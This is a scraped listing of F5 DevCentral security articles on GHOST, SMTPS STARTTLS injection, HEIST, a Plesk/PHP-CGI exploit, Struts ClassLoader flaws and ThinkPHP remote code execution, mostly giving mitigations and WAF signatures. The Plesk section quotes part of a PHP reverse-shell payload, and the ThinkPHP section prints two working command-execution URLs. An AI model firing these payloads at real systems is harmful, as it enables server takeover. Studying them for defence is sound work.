27 TopicsGHOST Vulnerability (CVE-2015-0235)
On 27 of January Qualys published a critical vulnerability dubbed “GHOST” as it can be triggered by the GetHOST functions ( gethostbyname*() ) of the glibc library shipping with the Linux kernel. Glibc is the main library of C language functionality and is present on most linux distributions. Those functions are used to get a corresponding structure out of a supplied hostname, while it also performs a DNS lookup if the hostname is a domain name and not an IP address. The vulnerable functions are obsolete however are still in use by many popular applications such as Apache, MySQL, Nginx and Node.js. Presently this vulnerability was proven to be remotely exploited for the Exim mail service only, while arbitrary code execution on any other system using those vulnerable functions is very context-dependent. Qualys mentioned through a security email list, the applications that were investigated but found to not contain the buffer overflow. Read more on the email list archive link below: Currently, F5 is not aware of any vulnerable web application, although PHP applications might be potentially vulnerable due to its “gethostbyname()” equivalent. UPDATE: WordPress content management system using xml-rpc ping back functionality was found to be vulnerable to the GHOST vulnerability. WordPress automatically notifies popular Update Services that you've updated your blog by sending a XML-RPC ping each time you create or update a post. By sending a specially crafted hostname as paramter of xml-rpc ping back method the vulnerable Wordpress will return "500" HTTP response or no response at all after resulting in memory corruption. However, no exploitability was proven yet. Using ASM to Mitigate WordPress GHOST exploit As the crafted hostname should be around 1000 characters to trigger the vulnerability, limiting request size will mitigate the threat. Add the following user defined attack signature to detect and prevent potential exploitation of this specific vulnerability for WordPress systems. For version greater than 11.2.x: uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; re2:"/https?://(?:.*?)?[\d\.]{500}/i"; For versions below 11.2.x: uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; pcre:"/https?://(?:.*?)?[\d\.]{500}/i"; This signature will catch any request to the "xmlrpc.php" URL which contains IPv4 format hostname greater than 500 characters. iRule Mitigation for Exim GHOST exploit At this time, only Exim mail servers are known to be exploitable remotely if configured to verify hosts after EHLO/HELO command in an SMTP session. If you run the Exim mail server behind a BigIP, the following iRule will detect and mitigate exploitation attempts: when CLIENT_ACCEPTED { TCP::collect } when CLIENT_DATA { if { ( [string toupper [TCP::payload]] starts_with "HELO " or [string toupper [TCP::payload]] starts_with "EHLO " ) and ( [TCP::payload length] > 1000 ) } { log local0. "Detected GHOST exploitation attempt" TCP::close } TCP::release TCP::collect } This iRule will catch any HELO/EHLO command greater than 1000 bytes. Create a new iRule and attach it to your virtual server.1.7KViews0likes7CommentsLTM :: SMTPS Command Injection
It seems the SMTPS profile on the LTM allows command injection. It is detected as: SMTP Service STARTTLS Plaintext Command Injection (52611) :: The remote SMTP service contains a software flaw in its STARTTLS implementation that could allow a remote unauthenticated attacker to inject commands during the plaintext protocol phase that will be executed during the ciphertext protocol phase. Successful exploitation could allow an attacker to steal a victim's email or associated SASL (Simple Authentication and Security Layer) credentials. To test, we modified the standard python smtplib library to send a malicious version of the command by appending the HELP command after STARTTLS. Packet capture shows execution of the command: What have folks done to get around this outside of writing an iRule? This is what I came up with... which SEEMS to work... but I'm by no means an expert. when CLIENT_DATA { if { [string tolower [TCP::payload 10]] starts_with "starttls" } { TCP::payload replace 0 [TCP::payload length] "STARTTLS\r\n" } TCP::release TCP::collect } when SERVER_CONNECTED { TCP::collect } when SERVER_DATA { TCP::release clientside { TCP::collect } }373Views0likes0CommentsHEIST Vulnerability – Overview and BIG-IP Mitigation
An interesting topic was talked about in the recent Black Hat conference. It is a new attack called HEIST (HTTP Encrypted Information can be Stolen through TCP-windows) which demonstrates how to extract sensitive data from any authenticated cross-origin website. What makes this attack unique is the ability to execute without any sort of traffic eavesdropping or man-in-the-middle scenarios. The attack happens in the browser, upon visiting an attacker-controlled website. Basics of a HEIST The HEIST attack, as described by Leuven University researchers Mathy Vanhoef and Tom Van Goethem, makes use of a new browser feature called Service Workers and specifically a new interface called Fetch API. The Fetch API, much like XMLHttpRequest (XHR), allows for arbitrary requests to be sent from the browser. These requests may also include sensitive authorization information such as session cookies. It is obviously not so trivial to read the responses from requests sent by Fetch API or XHR, due to the Same-origin Policy (SOP) enforced by the browser. However, it may be possible to use side channel attacks to infer information about the size of the response and in certain circumstances even extract personal data. No Empty Promises The attack uses the Fetch API and its performance measuring tool. Shortly after an arbitrary request is sent using Fetch API, the browser creates a Promise object in the DOM. This object is created once the browser starts receiving data from the server. A “responseEnd” attribute is added to the object once the browser fully receives the entire data. The “patent” of the attack is knowing whether the response consisted of either one TCP packet, or more. That is by measuring the time between the Promise object creation and “responseEnd”. This allows the attacker to detect an approximate size of any page, as it appears to the victim. For pages that reflect user-input data, the attacker may detect the exact size of the response. Can I (Ab)Use? Service Workers are supported in the following browsers: This table shows that a rather large majority of browsers in the market today already support Service Workers. The trend is expected to grow as Service Workers are useful with creating dynamic and responsive web applications. Source: Call the Police! In this section we’ll go over possible mitigations, including solutions available for BIG-IP users. Disable third-party cookies The researchers list disabling third-party cookies as the only real mitigation for this attack. By disabling this functionality, the browser won’t send authorization information in Fetch API and XHR requests made to cross-origin domains. Pros: Completely disables the attack. Cons: The setting happens in the browser. Web servers cannot enforce this setting upon users. Also, it is unclear what functionality may be hampered by disabling third-party cookies. Applying data in varying lengths to responses The researchers also list this action as a possible mitigation. The idea is to add data at random lengths to every response. This will considerably affect the attacker’s ability to understand what is the actual response length. The original attack requires up to 14 requests in order to detect the exact response length. By adding random data in different possible lengths, the attacker may have to work much harder and be more aggressive towards the web server. The following is an iRule that adds this functionality to BIG-IP virtual servers: when HTTP_RESPONSE { set sRandomString {} set iLength [expr {int(rand() * 1000 + 1)}] for {set i 0} {$i < $iLength} {incr i} { set iRandomNum [expr {int(rand() * 62)}] if {$iRandomNum < 10} { incr iRandomNum 48 } elseif {$iRandomNum < 36} { incr iRandomNum 55 } else { incr iRandomNum 61 } append sRandomString [format %c $iRandomNum] } HTTP::header insert X-HEIST $sRandomString log local0. "Added random header X-HEIST: $sRandomString" } This iRule will add a random string as a response header called “X-HEIST”. The string length ranges between 1 and 1000 chars. Pros: Adds significant complexity to the attack, possibly until the point that it is no longer feasible. Cons: Doesn’t completely shut down the vulnerability. In some cases, where the exact response length isn’t interesting to the attacker – this approach alone may be less effective. Block unknown origins Fetch API and XHR requests often add a request header that describes from which domain the request originated. For example, an XHR request in a script that runs on “” will add the following request header: Origin: The Origin header is not meant to be used as an access list for security needs. However, it is generally good practice to only allow known domains to be able to send Fetch API or XHR requests. This configuration is available in BIG-IP ASM (version 11.5.0 and up), under Security >> Application Security : URLs : Allowed URLs : Allowed HTTP URLs >> Allowed HTTP URL Properties: Pros: A request with an unknown Origin will be blocked by ASM, disallowing the browser from performing this attack. Cons: It may be challenging for website admins to create an allowlist of accepted domains. For public APIs it is often desired to allow all origins. In addition, there are some cases where the Origin header isn’t added to the request. Web Scraping protection Enabling Web Scraping protection in ASM may prevent this attack. Web Scraping protection is configurable under Security >> Application Security : Anomaly Detection : Web Scraping. Combining this protection with the iRule mentioned above creates adequate mitigation for this attack. By adding length randomization, the amount of requests the attacker must send is significantly increased. This will trigger Web Scraping detection in ASM once it is enabled. Furthermore, during the attack period the browser will fail answering the JavaScript challenges sent by ASM and therefore not receive the desired result from the server. Conclusion The HEIST attack is a unique and original form of attack. It uses legitimate functionality like cross-origin requests, and is based on known variables such as TCP slow start algorithm defaults. The attack uses side channel to retrieve data from cross-origin sources, despite the SOP protection found in browsers. As the researchers claim, the only real effective mitigation to this attack is disabling third-party cookies in the browser. However, using ASM and iRules we’ve shown that it’s possible to effectively mitigate this 0-day vulnerability using the tools and protections already found in BIG-IP.554Views0likes0CommentsPlesk Vulnerability
Recently we’ve witnessed another example of a relatively old and specific vulnerability come to life using a very common and wide spread application. In this case it was the CVE-2012-1823 vulnerability, being exploited using the Plesk admin panel. This vulnerability allows remote code execution by using a bug in the PHP CGI wrapper, which allows injecting CGI options to the executable, as well as piping other shell commands. Plesk is a tool that allows automated deployment and centralized management of various system services such as: Web hosting, DNS and E-Mail. It is a widely used application, popular amongst independent SMB’s. This “out in the wild” code-execution exploit attempts to upload PHP code onto the server, using the aforementioned vulnerability in the CGI module. Code injection is possible thanks to query data being passed unescaped directly to shell. This allows passing options to the CGI binary such as –r (execute code) and –d (define ini). In addition, command line pipe-lining is also possible because the entire argument is declared unquoted: #!/bin/sh exec /dh/cgi-system/php5.cgi $* By simply reviewing the source code of the exploit, no particular sophistication or elaborate attack pattern was found. It is a straight forward attack vector with PHP code in body, and CGI parameters in query. This part of the exploit sets the PHP-CGI flags: As we can see, the –d flag is used to declare some config line directives, and the –n flag to bypass the local php.ini. Then the payload is being sent, which is a PHP page that sets up a shell with a socket:. $pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip ='$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null;\$error_a = null; \$shell = '/bin/sh -i'; \$daemon = ... Issuing the exploit against an updated ASM version triggered the following signatures: 200004025 - PHP injection attempt ( <? ) 200004038 - PHP injection attempt ( posix_setsid ) 200100310 - "/bin" execution attempt (Parameter) 200100310 - Shell command (sh/ksh/etc) access (Value) 200100330 - PHP-CGI Shell Code Injection (v2) 200002437 - SQL-INJ "if(Expression,value,value)" (Parameter) The PHP and CGI signatures are quite expected, as well as the other command execution ones. As for the SQL-INJ signature, it could be considered a false positive since this attack was not SQL Injection. However, since the format of this signature resembles execution code as well as an SQL query – it is understandable why the PHP code located in the payload has triggered this signature.925Views0likes0CommentsMitigating The Apache Struts ClassLoader Manipulation Vulnerabilities Using ASM
Background Recently the F5 security research team has witnessed a series of CVE’s created for the popular Apache Struts platform. From Wikipedia: Apache Struts was an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture. It was originally created by Craig McClanahan and donated to the Apache Foundation in May, 2000. Formerly located under the Apache Jakarta Project and known as Jakarta Struts, it became a top-level Apache project in 2005. The initial CVE-2014-0094 disclosed a critical vulnerability that allows an attacker to manipulate ClassLoader by using the ‘class’ parameter, which is directly mapped to the getClass() method through the ParametersInterceptor module in the Struts framework. The Apache Struts security bulletin recommended upgrading to Struts to mitigate the vulnerability. Alternatively, users were also able to mitigate this vulnerability using a configuration change on their current Struts installations. The mitigation included adding the following regular expression to the list of disallowed parameters in ParametersInterceptor: '^class\.*' After several weeks, the solution was found to be incomplete, and sparked four new CVE’s: CVE-2014-0112, CVE-2014-0113, CVE-2014-0114 and CVE-2014-0116. Note: During the initial release of this article, CVE-2014-0114 and CVE-2014-0116 were not yet publicly disclosed, and weren't mentioned in this article. The article has now been edited to include mitigation for these CVEs as well. CVE-2014-0112 mentions the ClassLoader vulnerability still existing in parameters, and the security advisory for it suggests a new regular expression to include in the ParametersInterceptor config: (.*\.858Views0likes0CommentsLightboard Lessons: OWASP Top 10 - Using Components With Known Vulnerabilities
The OWASP Top 10 is a list of the most common security risks on the Internet today. The #9 risk in the latest edition of the OWASP Top 10 is "Using Components With Known Vulnerabilities". It may seem obvious that you wouldn't want to use components in your web application that have known vulnerabilities, but it's easier said than done. In this video, John discusses this problem and outlines some mitigation steps to make sure your web application stays secure. Related Resources: Securing against the OWASP Top 10: Using Components With Known Vulnerabilities Common Vulnerabilities and Exposures (CVE) Database National Vulnerability Database (NVD)634Views0likes0CommentsVulnerability scanner scan Virtual server found UDP 161 but there is no vip udp port 161?
Hi As title, I used ulnerability scanner to scan virtual server IP to found any open port (I have VIP port 443, 22, 80) result is scanner found UDP port 161 is opened but there is no vip udp port 161 in configuration. Why is UDP port 161 is found? is it by default that every virtual server is open/received port udp 161 too? Thank you1KViews0likes2Comments90 Seconds of Security: What is CVE and CVSS?
Security researchers at F5 monitor web traffic 24/7 at locations around the world and the F5 Security Incident Response Team (SIRT) helps customers tackle incident response in real time. And when they find a new vulnerability, it’ll often get a Common Vulnerability & Exposures number like CVE-2019-1105 for the ‘Outlook for Android Spoofing Vulnerability’. Created in 1999, the CVE provides definitions for all publicly known cybersecurity vulnerabilities and exposures. So, gimmie 90 Seconds to understand a little bit about the Common Vulnerability & Exposures. Now that we’ve looked at how vulnerabilities become CVEs, let’s explain how a CVE gets scored. The Common Vulnerability Scoring System or CVSS was introduced in 2005 as an open framework for communicating the characteristics and severity of software vulnerabilities. It consists of three metric groups: Base, Temporal, and Environmental. Once again, let’s start the clock to understand a little bit about the Common Vulnerability Scoring System. Hope that was helpful and you can catch the entire 90 Seconds Series on F5's YouTube Channel. ps1.1KViews0likes0CommentsVulnerabilities on Configuration utility login page.
Hi everyone I've perform pen-testing and found vulnerabilities on Configuration utility login page like this. 1.) Detect that F5 BIG-IP web management interface is running on this port. (Not sure if it's due to header F5-Login-Page: true, or not.) 2.) HTTP packet inspection. It's show HTTP protocol version used, whether HTTP Keep-Alive and HTTP pipelining are enabled from Configuration utility login page. Can we mitigate these two issue? ps. about (1) I think it's due to header F5-Login-Page but didn't know how to remove this header. about (2) Not sure how to fix this. Might have to perform packet filter IP on httpd services. thank you312Views0likes1CommentThinkPHP 5.x Remote Code Execution Vulnerability
ThinkPHP is an open source PHP development framework for agile web application development. The framework is vastly adopted worldwide, a quick Shodan search shows more than 40,000 active deployments. Recently, an unauthenticated remote code execution vulnerability was discovered in ThinkPHP, which was quickly adopted by large amount of threat actors who started scanning for vulnerable instances. The root cause of the vulnerability is the way that ThinkPHP parses the requested controller and executes the requested function. The patch committed to the Github repository by the maintainers showed that a regular expression validating the supplied controller name was added. Figure 1: Vulnerability patched by adding a Regular expression that validates the supplied controller name The reason for this addition is because ThinkPHP receives the requested module, controller and function to execute within a query parameter and splits it by using the ‘/’ character as a delimiter. Figure 2: ThinkPHP splits the received string in order to get the module and controller names Once ThinkPHP parsed the controller name and function, it first creates an instance of the supplied controller name by using reflection and then executes the requested function. Figure 3: ThinkPHP creates an instance of the requested controller and executes the requested function The two publicly disclosed vectors leading to arbitrary command execution are attempting to load a valid class of ThinkPHP. The two payloads are: http://thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l http://thinkphp/public/index.php?s=/index/\think\request/cache&key=ls%20-l|system The first attack vector will attempt to execute the “invokeFunction” method of the ThinkPHP App class, which allows specifying an arbitrary function to execute and passes the required arguments for this function. Figure 4: invokeFunction method of ThinkPHP App class The second attack vector attempts to execute the cache function of ThinkPHP Request class which attempts to split between a function name and parameter by using the ‘|’ character as delimiter. And, it later attempts to execute the function with its parameters. Figure 5: cache method of ThinkPHP Request class Mitigating the vulnerability with BIG-IP ASM BIG-IP ASM customers under any supported BIG-IP version are already protected against this vulnerability. The exploitation attempt will be detected by a dedicated attack signature recently released to mitigate the mentioned exploitation attempts which can be found in signature sets that include the “Server Side Code Injection” attack type or the “PHP” system. Figure 6: Exploitation attempt blocked by signature id 200004481 Advanced WAF customers with Threat Intelligence subscription are protected with the following Threat Campaigns: - ThinkPHP Remote Code Execution - HelloThinkPHP - ThinkPHP Remote Code Execution - curl zz3.9KViews0likes0Comments